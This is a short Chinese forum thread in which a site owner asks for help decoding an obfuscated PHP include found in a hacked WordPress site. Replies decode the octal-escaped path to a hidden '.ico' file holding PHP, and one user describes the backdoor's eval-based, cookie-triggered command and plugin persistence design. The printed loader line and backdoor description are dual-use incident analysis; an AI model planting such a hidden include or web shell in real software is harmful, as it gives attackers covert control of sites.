网站被黑，求解密

This topic created in 2857 days ago, the information mentioned may be changed or developed.

<?php
/*2baab*/

@include "\057ho\155e/\152im\155y/\144om\141in\163/i\156ba\156gb\141ng\056co\155/p\162iv\141te\137ht\155l/\167p-\151nc\154ud\145s/\122eq\165es\164s/\103oo\153ie\057.f\070b8\144b4\141.i\143o";

/*2baab*/

baab

PHP

解密

网站

6 replies • 2018-09-02 22:45:43 +08:00

msputup

Sep 2, 2018

@include "/home/jimmy/domains/inbangbang.com/private_html/wp-includes/Requests/Cookie/.f8b8db4a.ico";

你要看看你的 ico 这个文件，应该是一段 php 代码。

beastk

Sep 2, 2018 via iPhone

ascii ？

alect

Sep 2, 2018

@msputup 感谢，真的是 php 文件

https://pastebin.com/17mZ772D

msputup

Sep 2, 2018

@alect 这个也加密了。不太懂 php。

des

Sep 2, 2018

@alect
就是木马而已，知道了也没啥用。
建议清理了修补一下漏洞。

PS：
我还是仔细研究了一下，执行过程是
通过 eval 执行
从 $_COOKIE 或者 $_POST 获取参数，遍历每一个键值对反序列化，对比 key
正确的话取 action，action 有四种，分别是 info、eval （执行任意代码）、添加 plugin 和删除 plugin
plugin 的代码追加在自身文件中，plugin 里面的代码会在每次请求时执行
嗯，这就是所有的功能了~ o(*￣▽￣*)o

zsdroid

Sep 2, 2018

f12 了解下